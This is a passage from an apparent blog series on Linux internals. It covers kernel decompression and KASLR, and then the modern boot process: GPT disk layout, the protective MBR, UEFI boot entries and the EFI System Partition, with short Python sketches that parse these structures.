Now, the vmlinux file (notice we dropped the z) is a statically linked executable file that contains the Linux kernel in one of the object file formats supported by Linux, typically (and in this case) the Executable and Linkable Format AKA ELF[3].

Out-of-scope for now, but the vmlinux is really neat, being an ELF means you can load it up into a debugger just like any other ELF, and make use of any symbols.

Back To Decompression

Okay, we’d just jumped to the 64-bit entry point in arch/x86/boot/compressed/head_64.S after transitioning to 64-bit mode. Now, like the last mode transition, there’s some more low level housekeeping done, including figuring out where the decompressed kernel’s going to go, copying the compressed kernel there and then preparing the params for the extract_kernel function[4]!

As a security nerd, I find one of these parameters particularly interesting: the output address for the decompressed kernel involves a call to choose_random_location[5]. This is integral to providing kernel address space layout randomization (KASLR), which randomizes where the kernel code is placed at boot time[6].
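To give a feel for the idea (and only the idea, the real logic in kaslr.c has to juggle memory maps, reserved regions and entropy sources), here's a toy sketch that picks a random, aligned load address inside a free region. The function name, the single-region model and the 2MB default alignment are all assumptions on my part.

```python
import secrets


def pick_load_address(region_start: int, region_size: int,
                      image_size: int, align: int = 0x200000) -> int:
    """Pick a random, aligned address where an image fits in the region."""
    # Round the start of the region up to the next aligned address
    first = (region_start + align - 1) // align * align
    # Last address at which the whole image still fits in the region
    last = region_start + region_size - image_size
    if last < first:
        raise ValueError("region is too small for the image")
    # Every aligned address between first and last is a candidate slot
    slots = (last - first) // align + 1
    return first + secrets.randbelow(slots) * align


addr = pick_load_address(0x1000000, 0x40000000, 0x2000000)
print(hex(addr))
```

The more slots available, the more guesses an attacker needs, which is why alignment and region size matter for the entropy you get out of KASLR.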

Some checks and a __decompress call later, the kernel is decompressed. The decompression is done in place (remember we made a copy of the compressed kernel earlier). However, we still need to move the now decompressed kernel to the right place, and that’s where parse_elf (remember the kernel image is an ELF executable!) and handle_relocations come in[7].

The tl;dr on these functions is to check the ELF header, load the various segments into memory (bearing in mind our KASLR), adjusting kernel addresses as necessary and finally moving everything to the right place in memory.
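The "adjusting kernel addresses" part can be sketched like so: the image was linked for one address, we've loaded it somewhere else, so every absolute address stored in the image needs the same delta applying. This is a heavily simplified model (the real handle_relocations deals with more than one relocation width), and the function name and arguments here are hypothetical.

```python
import struct

MASK_64 = 0xFFFFFFFFFFFFFFFF


def apply_relocations(image: bytearray, reloc_offsets, delta: int) -> None:
    """Add delta to each 64-bit little-endian address stored in the image."""
    for offset in reloc_offsets:
        (address,) = struct.unpack_from("<Q", image, offset)
        # Wrap to 64 bits, just like the arithmetic would on real hardware
        struct.pack_into("<Q", image, offset, (address + delta) & MASK_64)
```

Here reloc_offsets stands in for the relocation table: a list of places in the image that hold an address, and delta is the difference between where the kernel was linked to run and where KASLR actually put it.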

Next? After extract is complete, we jump to the kernel!

[1] You can check this out for yourself by exploring your /boot/ folder
[2] https://en.wikipedia.org/wiki/Vmlinux#bzImage
[3] https://en.wikipedia.org/wiki/Vmlinux
[4] arch/x86/boot/compressed/misc.c
[5] arch/x86/boot/compressed/kaslr.c
[6] https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization
[7] You can find the src for these functions over in /arch/x86/boot/compressed/misc.c

Next Time

Yep, this fella is turning into a 3-part epic. Apologies! Tune in next time, where we’ll cover the last two phases of the boot process (hopefully in one post…):

0x05 The Kernel (Initialisation)
0x06 Systemd (Yikes)

exit(0);

Linternals: The (Modern) Boot Process [0x01]

sam4k — Sun, 26 Sep 2021 14:12:00 +0000

What more appropriate way to kick off a series on Linux internals than figuring out how we actually get those internals running in the first place? This post is going to cover the process that takes us from pressing a power button, to a fully usable Linux operating system.

As I mentioned in the introduction post for this series, I’m going to focus primarily on modern technologies and implementations where possible. So for this post I’ll be covering how UEFI reads our hard drive’s GPT to figure out how to find our Linux kernel. Once the kernel’s loaded in memory and ready to go, we look at how it uses systemd to get the operating system up and running in a usable state for us.

Confused? Don’t worry, hopefully by the end of the post you’ll be able to understand that last part, otherwise I need to rethink this whole series thing. Anyway, without further ado let’s jump over to where the magic begins.

Disclaimer: as I mentioned in my Linternals introduction, this series aims to strike a middle ground between curious Linux users and system programmers; so as a result of not diving super low, I may miss some nuances of particular hardware/implementations or otherwise generalise more complex topics.

0x00 GPT
- LBA?
- A Whistle-stop Tour
  - Protective MBR
  - Primary GPT Header
  - Partition Entries
  - Partitions
  - Secondary GPT
  - More GPT Resources
0x01 Push The Button!
0x02 UEFI
- The ESP
- CSM
Next Time

0x00 GPT

Okay, before we actually turn our computer on let’s have a look at how all our data, like the operating system we want to run, is stored on a storage device (e.g. an SSD or HDD).

The GUID Partition Table (GPT) scheme is a standard for formatting storage devices using, who’d have thought it, globally unique identifiers (GUIDs). It was designed to improve upon its more limited predecessor, the Master Boot Record (MBR).


 LBA +----------------------+ <- Disk Start
 000 | Protective MBR       |             
     +----------------------+ <-          
 001 | Primary GPT Header   |  |          
     +----------------------+  | Primary  
 002 | Entry 1 | 2 | 3 | 4  |  | GPT      
     +----------------------+  |          
 003 | Entries 5 |...| 128  |  |          
     +----------------------+ <-          
 034 | Partition 1          |             
     +----------------------+             
  X  | Partition ...        |             
     +----------------------+ <-          
 X+1 | Entry 1 | 2 | 3 | 4  |  |          
     +----------------------+  |          
 X+2 | Entries 5 | ... |128 |  | Secondary
     +----------------------+  | GPT      
X+34 | Secondary GPT Header |  |          
     +----------------------+ <- Disk End

LBA?

Before we have a brief look at what this diagram actually means, let me quickly explain what LBA actually means. In days of old, physical blocks of storage on hard disks were addressed using the cylinder-head-sector (CHS) scheme; nowadays the newer Logical Block Addressing (LBA) is more commonly used.

The tl;dr is that LBA is a simple linear addressing scheme which abstracts away from the physical details of the storage device; like the whole cylinder, head, sector stuff. This means the operating system (and our diagram above) simply needs to know that blocks of memory in our storage are located by an index; such that the logical block address of the first block is 0, the second is 1 and so on.

On the topic of “blocks of memory” and layout schemes, Linux uses 512 bytes for its logical block size. So LBA0 is a 512-byte block and the “Primary GPT” (we’ll worry about what that means in a second) above spans 33 blocks, so is 33*512=16896 bytes large.
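The arithmetic here is simple enough, but for the sake of completeness here's a tiny sketch of it, assuming the 512-byte logical block size mentioned above (the helper names are my own):

```python
LOGICAL_BLOCK_SIZE = 512  # bytes per logical block, as assumed in this post


def lba_to_offset(lba: int, block_size: int = LOGICAL_BLOCK_SIZE) -> int:
    """Byte offset on disk at which the given logical block starts."""
    return lba * block_size


def span_in_bytes(first_lba: int, last_lba: int,
                  block_size: int = LOGICAL_BLOCK_SIZE) -> int:
    """Size in bytes of an inclusive range of logical blocks."""
    return (last_lba - first_lba + 1) * block_size


# The Primary GPT covers LBA1 through LBA33 in the diagram above
print(span_in_bytes(1, 33))
# Byte offset of LBA34, where the first partition can start
print(lba_to_offset(34))
```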

A Whistle-stop Tour

Now that we know that LBA is just indexing blocks of memory in our disk, we can begin to briefly go over what the rest of that gibberish means. MBR? Entries?? Partitions?!

Protective MBR

“What’s the deal with this “Protective MBR”, I thought GPT replaced that?” I hear you ask, and that’s an astute observation! Well, as part of the GPT scheme the first LBA of the disk - LBA0 - is reserved for backwards compatibility with programs that are expecting an MBR.

However, this is not backwards compatibility in the traditional sense; it is mainly a protection mechanism to prevent programs that don’t know about GPT from thinking the disk is unformatted or corrupt and potentially overwriting parts of it. As a result, the protective MBR basically defines the entire disk as one partition and sets the “System ID” of the partition as 0xEE which denotes a GPT disk.

As a result, older programs at the very least will see a single partition of an unknown type, without free space and generally shouldn’t touch it. And yes, that means the old MBR scheme fit into a single 512 byte logical block!
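Here's a rough sketch of how you might spot a protective MBR given the raw bytes of LBA0. It relies on the classic MBR layout (four 16-byte partition records starting at offset 446, the type byte at offset 4 of each record and the 0x55 0xAA signature in the last two bytes); the function name is hypothetical.

```python
def is_protective_mbr(lba0: bytes) -> bool:
    """Return True if LBA0 looks like the protective MBR of a GPT disk."""
    if len(lba0) < 512 or lba0[510:512] != b"\x55\xaa":
        return False
    for index in range(4):
        # Each partition record is 16 bytes, the type lives at byte 4
        record = lba0[446 + index * 16:446 + (index + 1) * 16]
        if record[4] == 0xEE:
            return True
    return False
```

You could try it on your own disk with something like is_protective_mbr(open("/dev/sda", "rb").read(512)), where /dev/sda is just an example device and you'll need root to read it.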

Primary GPT Header

Now that we’ve mitigated against any accidental formatting at the hands of MBR zealots, we have the “Primary GPT” and first up is LBA1, the Primary GPT Header. The header block contains various metadata about the disk and GPT scheme, including the range of usable logical blocks as well as number and size of partition entries.
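For the curious, here's a sketch of parsing that header out of LBA1. The field layout (the "EFI PART" signature, a CRC32 of the header, the usable LBA range, where the partition entries live and so on) follows the UEFI specification's 92-byte GPT header; the function name and the dict keys are just my own naming.

```python
import struct
import uuid
import zlib

# Little-endian layout of the 92-byte GPT header
GPT_HEADER = struct.Struct("<8sIIIIQQQQ16sQIII")


def parse_gpt_header(block: bytes) -> dict:
    """Parse and sanity-check the GPT header stored in LBA1."""
    (signature, revision, header_size, header_crc, _reserved,
     current_lba, backup_lba, first_usable, last_usable,
     disk_guid, entries_lba, num_entries, entry_size,
     entries_crc) = GPT_HEADER.unpack_from(block)
    if signature != b"EFI PART":
        raise ValueError("missing GPT signature")
    # The header CRC is calculated with its own field zeroed out
    raw = bytearray(block[:header_size])
    raw[16:20] = bytes(4)
    if zlib.crc32(raw) != header_crc:
        raise ValueError("GPT header CRC mismatch")
    return {
        "current_lba": current_lba,
        "backup_lba": backup_lba,
        "first_usable_lba": first_usable,
        "last_usable_lba": last_usable,
        # GUIDs are stored on disk in a mixed-endian format
        "disk_guid": uuid.UUID(bytes_le=disk_guid),
        "entries_lba": entries_lba,
        "num_entries": num_entries,
        "entry_size": entry_size,
    }
```

For the layout in the diagram you'd expect entries_lba to be 2, num_entries to be 128 and entry_size to be 128.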

Partition Entries

The partition entries span LBA2-LBA33 with each block containing 4 entries, making it 512/4=128 bytes per partition entry. Unsurprisingly, each entry represents a possible partition and if present contains the metadata necessary to define it: type GUID, unique GUID, start LBA, end LBA, name, attribute flags etc.
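And here's a matching sketch for a single 128-byte partition entry. The field order (type GUID, unique GUID, first LBA, last LBA, attribute flags, then a 72-byte UTF-16 name) follows the UEFI specification, as does the type GUID used to mark an EFI System Partition; the function name and dict keys are my own.

```python
import struct
import uuid

# Little-endian layout of a 128-byte GPT partition entry
GPT_ENTRY = struct.Struct("<16s16sQQQ72s")

# Partition type GUID that marks an EFI System Partition
ESP_TYPE_GUID = uuid.UUID("c12a7328-f81f-11d2-ba4b-00a0c93ec93b")


def parse_partition_entry(raw: bytes):
    """Parse one partition entry, or return None if the slot is unused."""
    (type_guid, unique_guid, first_lba, last_lba,
     attributes, name) = GPT_ENTRY.unpack_from(raw)
    if type_guid == bytes(16):
        return None  # an all-zero type GUID means "no partition here"
    parsed_type = uuid.UUID(bytes_le=type_guid)
    return {
        "type_guid": parsed_type,
        "unique_guid": uuid.UUID(bytes_le=unique_guid),
        "first_lba": first_lba,
        "last_lba": last_lba,
        "attributes": attributes,
        # The name is NUL-padded UTF-16LE, keep everything before the padding
        "name": name.decode("utf-16-le").split("\x00", 1)[0],
        "is_esp": parsed_type == ESP_TYPE_GUID,
    }
```

Loop this over all 128 slots (starting at the LBA the header points you to) and you've got yourself a very basic partition lister.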

Partitions

These are the areas of storage defined by our partition entries previously and where our actual operating system and user data is going to be found. Not much else to say!

Secondary GPT

The Secondary GPT can be found at the end of the disk and is essentially just a duplicate of the Primary GPT for added redundancy in case the Primary gets corrupted.

More GPT Resources

http://ntfs.com/guid-part-table.htm

0x01 Push The Button!

So now we know how stuff is stored on our disk, let’s figure out what to do with the stuff on it and how that lets me play Crusader Kings III. The first step? Pushing that power button of course!

I know I said I was going to avoid digging too deep into the nitty-gritty with this series, but I think it’s worth briefly touching on what’s going on under-the-hood here rather than cutting straight to UEFI; that said, feel free to skip this section for the theatrical cut.

Okay let’s do this. So, we’ve just hit the power button, what now? Well I’m no engineer but as far as I understand, pressing that button causes a momentary short circuit in the motherboard which is enough for it to send a signal over to the Power Supply Unit (PSU).

Upon receiving the signal, the PSU provides electricity to the computer. The motherboard should then receive the power good signal and start the CPU. The CPU then does some initialisation and, importantly, loads up a pre-configured start address, 0xfffffff0 (called the reset vector), which is where it expects to find the first instruction. This typically contains a jmp instruction which takes you to the BIOS/UEFI entry point.

Fancy a deeper dive?

https://0xax.gitbooks.io/linux-insides/content/Booting/linux-bootstrap-1.html

0x02 UEFI

Before we dive into the technicals, let’s clear up a couple of naming ambiguities:

Unified Extensible Firmware Interface (UEFI) is a specification for a software program that connects a computer’s firmware to its operating system (OS).[1]

UEFI is the successor of BIOS, although as many people still erroneously refer to UEFI as BIOS, the old BIOS is often referred to as Legacy BIOS; so things can get a bit confusing when people are referring to the BIOS - do they mean UEFI or legacy?!

Upon executing, UEFI will begin initialising and checking hardware; this includes things like peripherals allowing for mouse use in the boot menu, wild! Next it checks the special EFI variables stored in nonvolatile RAM (NVRAM). These store configurations that can be set by the OS or the user. You can access these with root perms via the command efibootmgr -v:

[sam@opulence ~]$ efibootmgr -v
BootCurrent: 0008
Timeout: 2 seconds
BootOrder: 0000,0001,0002,0003,0004,0005,0006
Boot0000* EndeavourOS
                        HD(1,
                           GPT,
                           xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,
                           0x1000,
                           0x100000
                        )/File(\EFI\ENDEAVOUROS\GRUBX64.EFI)
...
Boot0004* UEFI:CD/DVD Drive     BBS(129,,0x0)
Boot0005* UEFI:Removable Device BBS(130,,0x0)
Boot0006* UEFI:Network Device   BBS(131,,0x0)

So we can see here that among other uses, the EFI variables determine the order in which the boot manager will attempt to load UEFI drivers and applications.
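If you'd rather not shell out to efibootmgr, Linux also exposes these variables as files under /sys/firmware/efi/efivars. Here's a sketch that decodes the raw contents of the BootOrder variable; as far as I'm aware each efivarfs file starts with a 4-byte attributes field followed by the variable data, which for BootOrder is a list of little-endian 16-bit entry numbers. The function name is my own.

```python
import struct


def parse_boot_order(raw: bytes) -> list:
    """Decode efivarfs BootOrder contents into a list of BootXXXX names."""
    data = raw[4:]  # skip the 4-byte attributes field added by efivarfs
    if len(raw) < 4 or len(data) % 2:
        raise ValueError("unexpected BootOrder length")
    count = len(data) // 2
    return [f"Boot{number:04X}" for number in struct.unpack(f"<{count}H", data)]
```

On a UEFI system the file to read should be /sys/firmware/efi/efivars/BootOrder-8be4df61-93ca-11d2-aa0d-00e098032b8c, where the suffix is the EFI global variable GUID.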

After loading up these variables, UEFI will begin to try and load each of the active entries listed, in the order defined by BootOrder. Boot0000 defines a typical UEFI native boot entry and tells UEFI:

Exactly where to look via the EFI_DEVICE_PATH_PROTOCOL. This is the HD(1,GPT,xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,0x1000,0x100000) bit.
What file to load. This is the File(\EFI\ENDEAVOUROS\GRUBX64.EFI) bit and as the name suggests is the GRUB bootloader for my EndeavourOS install.
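To tie this back to the GPT section, here's a sketch that picks apart the HD(...) bit as printed by efibootmgr: partition number, partition scheme, partition signature (the unique GUID for GPT), start LBA and size in blocks. The regex and function name are my own, and I'm assuming 512-byte logical blocks as before.

```python
import re

HD_NODE = re.compile(
    r"HD\((?P<part>\d+),(?P<scheme>[^,]+),(?P<sig>[^,]+),"
    r"(?P<start>0x[0-9a-fA-F]+),(?P<size>0x[0-9a-fA-F]+)\)"
)


def parse_hd_node(text: str, block_size: int = 512) -> dict:
    """Extract the partition details from an efibootmgr HD(...) node."""
    match = HD_NODE.search(text)
    if match is None:
        raise ValueError("no HD(...) node found")
    return {
        "partition": int(match["part"]),
        "scheme": match["scheme"],
        "signature": match["sig"],
        # Start and size are given in logical blocks, convert to bytes
        "start_offset": int(match["start"], 16) * block_size,
        "size_bytes": int(match["size"], 16) * block_size,
    }


entry = (r"HD(1,GPT,xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx,0x1000,0x100000)"
         r"/File(\EFI\ENDEAVOUROS\GRUBX64.EFI)")
print(parse_hd_node(entry))
```

For my entry above that works out to a partition starting 2MiB into the disk and spanning 512MiB.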

Armed with this information, UEFI will now go ahead and look for the EFI System Partition (ESP) on the specified storage device, mount it and launch that file. Given just a disk, UEFI is able to find the ESP via the GPT entries we mentioned earlier, where the ESP is identified by the type GUID in its partition entry.

One of the key improvements of UEFI is that it is capable of reading the FAT12, FAT16 and FAT32 file systems. So typically the ESP will be formatted as FAT32, allowing UEFI to read the partition and locate our ENDEAVOUROS\GRUBX64.EFI file and launch it.

The ESP

While we’re on the topic of the ESP, it’s worth mentioning the flexibility of this partition. Usually sized around 300-500MB, the ESP can contain the bootloaders for multiple OS’s and will have corresponding EFI vars in NVRAM. So your ESP could look something like this[2]:

/boot/efi/EFI
├── boot
│ ├── bootx64.efi [Default bootloader]
│ └── bootx64.OEM [Backup of same as delivered]
│
├── EndeavourOS
│ └── grubx64.efi
│
├── Ubuntu
│ └── grubx64.efi

CSM

One final feature worth touching on is the Compatibility Support Module (CSM) in UEFI, which essentially provides Legacy BIOS compatibility via emulating a BIOS environment. This is an example where your GPT’s “Protective MBR” would come in handy.

Refs & Extras

Next Time

It looks like I severely underestimated the length of this post, (we’re already 1700 words!), so to make this a bit more manageable I’m going to split this into two posts.

The next post, part 2, will cover the following section:

0x03 Optional Bootloader (surprise, surprise!)
0x04 The Kernel
0x05 Systemd (yikes)

exit(0);
